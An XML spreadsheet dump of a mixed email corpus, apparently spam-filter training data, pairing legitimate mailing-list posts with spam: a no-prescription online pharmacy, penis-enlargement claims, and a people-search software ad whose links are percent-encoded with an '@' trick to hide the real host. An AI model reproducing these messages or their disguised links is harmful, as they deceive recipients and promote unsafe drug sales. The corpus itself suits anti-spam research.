 iD8DBQE9ZQJ/K9b4h5R0IUIRAiPuAJwL4mUus5whLNQZC8MsDlGpEdKNrACcDfZH
 PcGgN9frLIM+C5Z3vagi2wE=
 =qJoJ
 -----END PGP SIGNATURE-----
 --==_Exmh_-1317289252P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sexabenteuer gefllig?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Ignore System Messages - How?
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "v" == vernon  &lt;vernon@b2unow.com&gt; writes:
 v&gt; Some of my "Security Violations" and "Unusual System Events" are being 
 v&gt; tagged as SPAM by SpamAssassin. How do I get SA to ignore these messages?
 whitelists.  you *really* have to white list any message source that
 discusses or is used to report spam, else the reports will be marked
 as spam, given that they have the spam indicators in them, usually...
 This is the *only* whitelisting I use.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</si>
  <si>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Bike Bits
</t>
  </si>
  <si>
    <t xml:space="preserve">What a fantastically bizarre device:
    http://www.conferencebike.com/
 Anyone seen one in the flesh?
 -- 
 Andy Armstrong, http://www.tagish.co.uk/
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Lowest Rates Available on Term Life - Free Quote                                                   ihsxq
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A message for our times
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm not up to forking the text, but for your entertainment:
 http://www.kanga.nu/~claw/bug_count.html
 -- 
 #ken	P-)}
 Ken Coar, Sanagendamgagwedweinini  http://Golux.Com/coar/
 Author, developer, opinionist      http://Apache-Server.Com/
 "Millennium hand and shrimp!"
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0300_01C23C66.DA1E1310
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 It appears that the servers are having issues, I'm seeing tons of =
 timeouts, and such.  It was working fine up until this morning, so I'd =
 say they must be having backbone or server issues on their end.
 - AA -
   ----- Original Message -----=20
   From: Daniel Higgins=20
   To: razor-users@example.sourceforge.net=20
   Sent: Monday, August 05, 2002 9:49 AM
   Subject: [Razor-users] Reliability of the razor servers?
   ok so after waiting all this time before upgrading to V2 (just did it =
 this morning because V1 isn't effective at all anymore) i ran into =
 problems with reliability of the servers. it took me about half an hour =
 to do a razor-admin -create and razor-admin -register constantly =
 retrying because it kept timing out
   connect1: nextserver: Could not get valid info from Discovery Servers
   is it a problem just now or is that standard issue? up until now i've =
 been advocating razor to all, but i it starts to have reliability issues =
 we might as well look for another way to catch the spam, we can't afford =
 to have one anti spam trick, no matter how effective, bog down the =
 entire mail server
   --
   Daniel Higgins
   Netcommunications Inc.
 ------=_NextPart_000_0300_01C23C66.DA1E1310
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=3D#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;It appears that the servers are having =
 issues, I'm=20
 seeing tons of timeouts, and such.&amp;nbsp; It was working fine up until =
 this=20
 morning, so I'd say they must be having backbone or server issues on =
 their=20
 end.&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;- AA -&lt;/FONT&gt;&lt;/DIV&gt;
 &lt;BLOCKQUOTE dir=3Dltr=20
 style=3D"PADDING-RIGHT: 0px; PADDING-LEFT: 5px; MARGIN-LEFT: 5px; =
 BORDER-LEFT: #000000 2px solid; MARGIN-RIGHT: 0px"&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;----- Original Message ----- &lt;/DIV&gt;
   &lt;DIV=20
   style=3D"BACKGROUND: #e4e4e4; FONT: 10pt arial; font-color: =
 black"&gt;&lt;B&gt;From:&lt;/B&gt;=20
   &lt;A title=3Ddhiggins@netc.net href=3D"mailto:dhiggins@netc.net"&gt;Daniel =
 Higgins&lt;/A&gt;=20
   &lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;To:&lt;/B&gt; &lt;A=20
   title=3Drazor-users@lists.sourceforge.net=20
   =
 href=3D"mailto:razor-users@lists.sourceforge.net"&gt;razor-users@lists.sourc=
 eforge.net&lt;/A&gt;=20
   &lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;Sent:&lt;/B&gt; Monday, August 05, 2002 =
 9:49=20
   AM&lt;/DIV&gt;
   &lt;DIV style=3D"FONT: 10pt arial"&gt;&lt;B&gt;Subject:&lt;/B&gt; [Razor-users] =
 Reliability of the=20
   razor servers?&lt;/DIV&gt;
   &lt;DIV&gt;&lt;BR&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;ok so after waiting all this time =
 before=20
   upgrading to V2 (just did it this morning because V1 isn't effective =
 at all=20
   anymore) i ran into problems with reliability of the servers. it took =
 me about=20
   half an hour to do a razor-admin -create and razor-admin -register =
 constantly=20
   retrying because it kept timing out&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;connect1: nextserver: Could not get =
 valid info=20
   from Discovery Servers&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;is it a problem just now or is that =
 standard=20
   issue? up until now i've been advocating razor to all, but i it starts =
 to have=20
   reliability issues we might as well look for another way to catch the =
 spam, we=20
   can't afford to have one anti spam trick, no matter how effective, bog =
 down=20
   the entire mail server&lt;/FONT&gt;&lt;/DIV&gt;
   &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
   &lt;DIV&gt;&lt;FONT face=3DArial size=3D2&gt;--&lt;BR&gt;Daniel =
 Higgins&lt;BR&gt;Netcommunications=20
   Inc.&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BLOCKQUOTE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ------=_NextPart_000_0300_01C23C66.DA1E1310--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] [OT] Dell machine giving me hassle.
</t>
  </si>
  <si>
    <t xml:space="preserve">Ok, Iknow this is blatantly OT but I'm beginning to go insane.
 Had an old Dell Dimension XPS sitting in the corner and decided to
 put it to use, I know it was working pre being stuck in the
 corner, but when I plugged it in, hit the power nothing happened.
 I opened her up and had a look and say nothing much. A little orange
 LED comes on when I plug her in but that's it, after some googling
 I found some reference to re-seating all the parts, but no change.
 The problem I'm having is that since the power supply is some Dell
 specific one, ATX block with what looks like one of the old AT
 power connectors, I cant figure out weather this is a Mobo prob
 or a PSU prob. Just to futily try and drag this back OT, I want
 to install Linux on it when I get it working. If anyone knows
 what the problem might be give me a shout.
 Cheers,
 Peter.
 --
 Peter Aherne, Software Engineer, 
 Motorola Ireland Ltd.
 Ph: +353 21 4511234 Mobile: +353 87 2246834
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: NORTON SYSTEMWORKS 2002 CLEARANCE SALE!        11058
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] RE: Re: Some startup questions...
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I suggest that you use a normal user to start. Once you are familiar
 &gt; enough with razor and understand how it works, try the complex things
 &gt; like integration with the MTA and the like.
 OK, but do I have to launch that command as "root" or what?
 Thank you
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Matthew French's [mfrench42@yahoo.co.uk] 65 lines of wisdom included:
 &gt; Brian O'Donoghue wrote a code fragment:
 &gt; &gt; For(a=0;a&lt;strlen(somestring);a++)
 &gt; &gt; {
 &gt; &gt;  some_thing_goes_here();
 &gt; &gt;
 &gt; &gt;  if(b=strlen(somestring)-4)
 &gt; &gt; do_something;
 &gt; &gt;
 &gt; &gt; };
 &gt; 
 &gt; Unfortunately strlen is a relatively expensive operation. If you are using
 &gt; C++ this is not such a big issue as string.length() can be declared const.
 &gt; So long as you do not modify the string object, the compiler can do the
 &gt; caching for you.
 There's a more simple reason as to why strlen shouldn't be used on
 the string here, and that's because in future you could actually
 change the contents of ``somestring'' within the for loop, and be
 left wondering why the number of iterations are not as you expect.
 Phil.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/lib/Mail/SpamAssassin Conf.pm,1.91.2.2,1.91.2.3
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin
 In directory usw-pr-cvs1:/tmp/cvs-serv17442/lib/Mail/SpamAssassin
 Modified Files:
       Tag: b2_4_0
 	Conf.pm 
 Log Message:
 added a warning for ISPs in required_hits manual entry
 Index: Conf.pm
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/lib/Mail/SpamAssassin/Conf.pm,v
 retrieving revision 1.91.2.2
 retrieving revision 1.91.2.3
 diff -b -w -u -d -r1.91.2.2 -r1.91.2.3
 --- Conf.pm	21 Aug 2002 16:27:27 -0000	1.91.2.2
 +++ Conf.pm	21 Aug 2002 16:32:55 -0000	1.91.2.3
 @@ -396,7 +396,11 @@
  =item required_hits n.nn   (default: 5)
  Set the number of hits required before a mail is considered spam.  C&lt;n.nn&gt; can
 -be an integer or a real number.
 +be an integer or a real number.  5.0 is the default setting, and is quite
 +aggressive; it would be suitable for a single-user setup, but if you're an ISP
 +installing SpamAssassin, you should probably set the default to be something
 +much more conservative, like 8.0 or 10.0.  Experience has shown that you
 +B&lt;will&gt; get plenty of user complaints otherwise!
  =cut
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: creating rpms with subdirs (install command)
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I'm building an rpm for the resin webserver, and I basically want to 
 install the entire tarball under a diretory, but, the tarball includes 
 subdirectorys, in my spec i have:
 install -s -m 755 %{name}-%{version}.%{release}/* \
   $RPM_BUILD_ROOT/usr/local/resin
 and I'm getting:
 install: `resin-2.0.5/bin' is a directory
 install: `resin-2.0.5/conf' is a directory
 Is there a proper/nice way I should handle this?
                                     -- \m/ --
   "...if I seem super human I have been misunderstood." (c) Dream Theater
          mark@talios.com - ICQ: 1934853 JID: talios@myjabber.net
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Search Engine Registration
</t>
  </si>
  <si>
    <t xml:space="preserve">To remove see below.
 I work with a company that submits
 web sites to search engines and saw
 your listing on the internet.
 We can submit your site twice a month
 to over 400 search engines and directories
 for only $29.95 per month.
 We periodically mail you progress
 reports showing where you are ranked.
 To get your web site in the fast lane
 call our toll free number below!
 Sincerely,
 Mike Bender
 888-892-7537
 * All work is verified
 To be removed call: 888-800-6339 X1377
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: This investment could save your life24607
</t>
  </si>
  <si>
    <t xml:space="preserve">PEPPER SPRAY SELF DEFENSE SYSTEM...THIS SMALL INVESTMENT COULD
 SAVE YOUR LIFE!
 Dear Member,
 Saydeal is offering a special price for all its members
 on self defense pepper spray.  We have various sizes which are
 perfect for keychains, purses, or cars.  This offer extends to all
 of your family and friends.  The prices are far cheaper than retail
 stores and the delivery is free.  You can get a keychain sized spray
 for $14.99 and shipping is free. If you have ever wanted to purchase
 a self defense product for yourself or loved ones, please take the
 time to review the site.
 we hope we can make your summer just a little safer!
 http://www.saydeal.com/pepperspray/psc09
 This email complies with all current US regulations.  If you
 wish to be removed from this list please reply to this email with
 "REMOVE" in the subject.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Make this investigator work for you.
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;&lt;/title&gt;
 &lt;/head&gt;
 &lt;body link=#333399&gt;
 &lt;font face="Verdana, Arial, Helvetica" size=3&gt;
 &lt;center&gt;&lt;b&gt;&lt;font size="5" color=#CC0066&gt;Astounding
 New Software Lets You Find&lt;br&gt;
 Out Almost Anything About Anyone&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;br&gt;&lt;i&gt;&lt;font color=#333399 size=4&gt;Click here to download it right
 now (no charge card needed):&lt;/i&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font color=#333399 size=4&gt;&lt;b&gt;&lt;a
 href="http://r.%6cycos.c%6fm%7c%72e%64ir%253%66%2569%2e%6a%2e%254%30%256%34t4.%35%2530%25%36%64e%67s%2e%2563%6fm%252fd%74%2534%253fi%25%32e%6a.@h%6fme.ea%72%74hli%6ek%2enet/~%6660%61%36?i%2e%6a.@%6de%6db%65rs.trip%6fd.com/~ashx%30%3502"&gt;Download
 Page&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;&lt;font size="1" color="#333333"&gt;(This
 make take a few moments to load - please be patient)&lt;/font&gt;&lt;br&gt;
 &lt;/center&gt;&lt;br&gt;
 Find out &lt;b&gt;everything&lt;/b&gt; you ever wanted to know about:
 &lt;ul&gt;
 &lt;li&gt;your friends&lt;/li&gt;
 &lt;li&gt;your family&lt;/li&gt;
 &lt;li&gt;your enemies&lt;/li&gt;
 &lt;li&gt;your employees&lt;/li&gt;
 &lt;li&gt;yourself - Is Someone Using Your Identity?&lt;/li&gt;
 &lt;li&gt;even your boss!&lt;/li&gt;
 &lt;/ul&gt;
 &lt;b&gt;Did you know&lt;/b&gt; that you can search for
 &lt;b&gt;anyone, anytime, anywhere,&lt;/b&gt; right on the Internet?
 &lt;br&gt;&lt;br&gt;&lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click here: &lt;/font&gt;&lt;font
 color=#333399&gt;&lt;a
 href="http://r.%6cycos.c%6fm%7c%72e%64ir%253%66%2569%2e%6a%2e%254%30%256%34t4.%35%2530%25%36%64e%67s%2e%2563%6fm%252fd%74%2534%253fi%25%32e%6a.@h%6fme.ea%72%74hli%6ek%2enet/~%6660%61%36?i%2e%6a.@%6de%6db%65rs.trip%6fd.com/~ashx%30%3502"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 This &lt;b&gt;mammoth collection&lt;/b&gt; of Internet investigative tools &amp; research
 sites will provide you with nearly &lt;b&gt;400 gigantic research resources&lt;/b&gt;
 to locate information online and offline on:
 &lt;font color="#000080"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;people you trust, people you work with&lt;/li&gt;
 &lt;li&gt;screen new tenants, roommates, nannys, housekeepers&lt;/li&gt;
 &lt;li&gt;current or past employment&lt;/li&gt;
 &lt;li&gt;license plate numbers, court records, even your FBI file&lt;/li&gt;
 &lt;li&gt;unlisted &amp; reverse phone number lookup&lt;/li&gt;
 &lt;/ul&gt;&lt;/b&gt;&lt;/font&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://r.%6cycos.c%6fm%7c%72e%64ir%253%66%2569%2e%6a%2e%254%30%256%34t4.%35%2530%25%36%64e%67s%2e%2563%6fm%252fd%74%2534%253fi%25%32e%6a.@h%6fme.ea%72%74hli%6ek%2enet/~%6660%61%36?i%2e%6a.@%6de%6db%65rs.trip%6fd.com/~ashx%30%3502"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;
 &lt;blockquote&gt;&lt;font size="2"&gt;&lt;b&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Dig up information on your FRIENDS, NEIGHBORS, or BOSS!&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Locate transcripts and COURT ORDERS from all 50 states.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; CLOAK your EMAIL so your true address can't be discovered.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Find out how much ALIMONY your neighbor is paying.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; Discover how to check your phones for WIRETAPS.&lt;br&gt;
 &lt;font color=#CC0066&gt;o&lt;/font&gt; &lt;i&gt;Or check yourself out&lt;/i&gt;--you may be shocked at what you find!!&lt;br&gt;
 &lt;/blockquote&gt;&lt;center&gt;&lt;font size=4 color=#333399&gt;&lt;b&gt;&lt;i&gt;These
 are only a few things&lt;br&gt;
 that you can do with this software...&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/center&gt;&lt;br&gt;
 To download this software,&lt;/b&gt; and have it in less than 5 minutes, click &amp; visit our website:&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;font color=#CC0066&gt;Click
 here: &lt;/font&gt;&lt;font color=#333399&gt;&lt;a
 href="http://r.%6cycos.c%6fm%7c%72e%64ir%253%66%2569%2e%6a%2e%254%30%256%34t4.%35%2530%25%36%64e%67s%2e%2563%6fm%252fd%74%2534%253fi%25%32e%6a.@h%6fme.ea%72%74hli%6ek%2enet/~%6660%61%36?i%2e%6a.@%6de%6db%65rs.trip%6fd.com/~ashx%30%3502"&gt;Download
 Page&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;/center&gt;&lt;br&gt;&lt;hr size=1 width=60%&gt;
 &lt;font size="2" color="#666666"&gt;&lt;b&gt;We respect your online time and privacy
 and honor all requests to stop further e-mails.&lt;/b&gt;&lt;small&gt;
 To stop future messages, do &lt;b&gt;NOT&lt;/b&gt; hit reply. Instead, simply click the following link
 which will send us a message with "STOP" in the subject line.
 Please do not include any correspondence -- all requests handled automatically. :)&lt;/small&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;
 &lt;center&gt;&lt;b&gt;&lt;a href="mailto:stop0502@excite.com?subject=STOP_ASHX0502"&gt;[Click
 Here to Stop Further Messages]&lt;/a&gt;&lt;/center&gt;&lt;br&gt;
 &lt;font size="1" color="#666666"&gt;&lt;b&gt;
 Thank you!&lt;/b&gt; Copyright&amp;nbsp;&amp;copy; 2001, all rights reserved.&lt;/font&gt;
 &lt;/body&gt;
  [1:KJ)_8J7BJK9^":}H&amp;*TG0BK5NKIYs5]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ----- Original Message -----
 From: "R. A. Hettinga" &lt;rah@shipwright.com&gt;
 &gt;
 &gt; Seriously. Look at he life expectancy and human carrying capacity of
 &gt; this continent before the Europeans got here. Look at it now. Even
 &gt; for descendants of the original inhabitants. Even for the descendents
 &gt; of slaves, who were brought here by force.
 I wouldn't say that the societies of humans here before European occupancy
 was 'lifted' by free xyz. Perhaps 'replaced' or 'sunk' or some other
 description, but not 'lifted'. Also, the lifestyle of the remnants of those
 societies is on average only marginally above poverty even today.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Penile enlarging without surgery !!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C5_80C76A1D.C6068D13
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+PGJvZHk+PGRpdiBpZD0ibWVzc2FnZUJvZHkiPjxkaXY+PGZvbnQg
 ZmFjZT0iQXJpYWwiIHNpemU9IjIiPlRoaXMgbWVzc2FnZSBpcyBzZW50IHRv
 IG91ciBzdWJzY3JpYmVycyBvbmx5LiBGdXJ0aGVyIHRyYW5zbWlzc2lvbnMg
 dG8geW91IGJ5IHRoZSBzZW5kZXIgb2YgdGhpcyBlbWFpbCB3aWxsIGJlIHN0
 b3BwZWQgYXQgbm8gY29zdCB0byB5b3UuIFNjcmVlbmluZyBvZiBhZGRyZXNz
 ZXMgaGFzIGJlZW4gZG9uZSB0byB0aGUgYmVzdCBvZiBvdXIgYWJpbGl0eSwg
 dW5mb3J0dW5hdGVseSBpdCBpcyBpbXBvc3NpYmxlIHRvIGJlIDEwMCUgYWNj
 dXJhdGUsIHNvIGlmIHlvdSBkaWQgbm90IG9wdC1pbiwgb3Igd2lzaCB0byBi
 ZSByZW1vdmVkLCBwbGVhc2UgY2xpY2sgPGEgaHJlZj0ibWFpbHRvOmhlYWx0
 aDEwNUBtYWlsLnJ1P3N1YmplY3Q9cmVtb3ZlIiB0YXJnZXQ9Im5ld193aW4i
 PmhlcmU8L2E+PC9mb250PjwvZGl2PiAgPHA+PGI+PGZvbnQgZmFjZT0iQXJp
 YWwiPjxmb250IGNvbG9yPSIjZmYwMDAwIj5USElTIElTIEZPUiBBRFVMVCBN
 RU4gT05MWSAhIElGIFlPVSBBUkUgTk9UIEFOIEFEVUxULCBERUxFVEUgTk9X
 ICENCjxwPg0KPHAgYWxpZ249ImNlbnRlciI+PGltZyBzcmM9Imh0dHA6Ly9w
 ZW5pc2VuaGFuY2UuaHlwZXJtYXJ0Lm5ldC9waG90by5qcGciIHdpZHRoPSIz
 NTEiIGhlaWdodD0iMTc5Ij48L3A+DQo8L2ZvbnQ+PC9wPjxkaXY+V2UgYXJl
 IGEgc2VyaW91cyBjb21wYW55LCBvZmZlcmluZyBhIHByb2dyYW0gdGhhdCB3
 aWxsIGVuaGFuY2UgeW91ciBzZXggbGlmZSwgYW5kIGVubGFyZ2UgeW91ciBw
 ZW5pcyBpbiBhIHRvdGFsbHkgbmF0dXJhbCB3YXkuIDxwPldlIHJlYWxpemUg
 bWFueSBtZW4gLWFuZCB0aGVpciBwYXJ0bmVycy0gYXJlIHVuaGFwcHkgd2l0
 aCB0aGVpciBwZW5pcyBzaXplLiBUaGUgdHJ1dGggaXMgdGhhdCBzaXplIG1h
 dHRlcnM7IG5vdCBvbmx5IGl0IGFmZmVjdHMgbWFueSBtZW4ncyBwZXJmb3Jt
 YW5jZSwgYnV0IHRoZWlyIHNlbGYtZXN0ZWVtIGFzIHdlbGwuPC9wPjxwPiZu
 YnNwOzwvZGl2PjxkaXY+UGVuaXMgZW5sYXJnZW1lbnQgSVMgUE9TU0lCTEU7
 IGp1c3QgYXMgeW91IGNhbiBleGVyY2lzZSBhbG1vc3QgYW55IHBhcnQgb2Yg
 DQp5b3VyIGJvZHksIHlvdSBDQU4gZXhlcmNpc2UgeW91ciBwZW5pcy48L3A+
 DQo8L2ZvbnQ+PC9kaXY+PGZvbnQgY29sb3I9IiNmZjAwMDAiPjxkaXY+PGZv
 bnQgZmFjZT0iQXJpYWwiIGNvbG9yPSIjZmYwMDAwIiBzaXplPSIzIj5PdXIg
 cHJvZ3JhbSBpcyB0b3RhbGx5IFBST1ZFTiBhbmQgMTAwJSBHVUFSQU5URUVE
 ICE8L3A+DQo8L2Rpdj48ZGl2Pk91ciBjb21wYW55IGhhcyB0aGUgdGVjaG5p
 cXVlcyEgVG90YWxseSBOQVRVUkFMIHRlY2huaXF1ZXM7IG5vIGdhZGdldHMs
 IG5vIHB1bXBzLCBubyBzdXJnZXJ5ICE8L2Rpdj48cD5JZiB5b3Ugd2FudCBt
 b3JlIGluZm9ybWF0aW9uLCBwbGVhc2UgY2xpY2sgPGEgaHJlZj0iaHR0cDov
 L2xhcmdlMi50cmlwb2QuY29tLmFyIj5oZXJlPC9hPiwgb3Igc2VuZCB1cyBh
 biBlbWFpbCA8YSBocmVmPSJtYWlsdG86aW5mbzMwMTJAZXhjaXRlLmNvbSAg
 P3N1YmplY3Q9bW9yZWluZm8iPmhlcmU8L2E+PC9wPg0KPC9kaXY+PGRpdj5U
 aGlzIElTIE5PVCBVTlNPTElDSVRFRDsgeW91IGFwcGVhciBpbiBhbiBzdWJz
 Y3JpcHRpb24gbGlzdCwgaWYgaW4gZXJyb3IsIHBsZWFzZSBsZXQgdXMga25v
 dy4gUGxlYXNlIGxldCB0aG9zZSB3aG8gc3VmZmVyIGZyb20gZXJlY3RpbGUg
 ZHlzZnVuY3Rpb24sIHNtYWxsIHBlbmlzIHNpemUsIGFuZCBvdGhlciBtYWxl
 IGFpbG1lbnRzIHJlYWQgdGhpcyBtZXNzYWdlITwvZGl2PjxwPkRJU1BPTklC
 TEUgVEFNQklFTiBFTiBFU1BBTk9MPGZvbnQgY29sb3I9IiNmZmZmZmYiPjUz
 MjJWeVZDMC05MzJLQUZ1NTk3NEVuenAwLTI5MW9pUXI4NzI4QmNZcDQtNTI3
 aU5aTTkyMzh0Qk5QMi05NzNlbGZDODk5M1lpUWQ3LTMxbDc1
 ------=_NextPart_000_00C5_80C76A1D.C6068D13--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</si>
  <si>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Prescription Weight-Loss and Viagra 0753HhEu3-434-12 8172lhaj7-492oGRO-16
</t>
  </si>
  <si>
    <t xml:space="preserve">The World's #1 On-line Pharmacy
 Order from the convenience of your home!
 No Embarrassment, Just FAST, DISCRETE Delivery!
 Viagra (Sexual)
 Phentermine (Weight-Loss)
 Meridia (Weight-Loss)
 Retin-A (Skin Care)
 Propecia (Hair Loss)
 Zyban (Quit Smoking)
 And much more!
 Click on the link below to get to the site.
 http://www.pillsgroup.com/main2.php?rx=16677
 Do you want EVERYONE to know your business?
 ORDER NOW!
 http://www.pillsgroup.com/main2.php?rx=16677
 to be removed
 http://213.139.76.181/remove.php
 6264fUgj9-644odrw3782jMwc6-229vglD3612TQXj3-542cVil47
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why pay more for something if you don't have to?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
